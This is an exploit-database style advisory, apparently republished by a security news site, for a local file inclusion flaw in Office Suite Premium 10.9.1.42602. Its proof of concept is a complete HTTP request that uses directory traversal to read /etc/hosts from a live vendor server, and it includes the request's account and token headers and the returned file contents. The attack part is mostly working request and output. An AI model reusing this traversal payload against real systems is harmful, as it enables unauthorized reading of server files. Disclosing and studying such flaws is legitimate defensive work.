Home Tools Exploits & CVE's Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium 10.9.1.42602 Local File Inclusion

June 28, 2023

259

Authored by tmrswrr

Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

# Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion 
# Date: 06-26-2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.mobisystems.com/
# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506
# Version: Office Suite Premium 10.9.1.42602
# Tested on: Ubuntu 18.04


# POC

GET /../../../../../../../../../../../../../../../etc/hosts HTTP/2
Host: connect.mobisystems.com
Accept: */*
Clv: 42602
Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.free
Accept-Language: tr-TR,tr;q=0.9
Accept-Encoding: gzip, deflate
App: com.mobisystems.ios.office.free
User-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0
Gdpr: true
Account: 234c89ff-7e80-4b64-9d35-8653fe131795
Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19

Result : 

127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine 

Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Follow us on Instagram @thecyberpost

EDITOR PICKS

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Gambio Online Webshop 4.9.2.0 Remote Code Execution

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

iRZ Mobile Router Cross Site Request Forgery / Remote Code Execution

WEBY 1.2.5 Cross Site Request Forgery

ZKTeco ZEM500-510-560-760 / ZEM600-800 / ZEM720 / ZMM Missing Authentication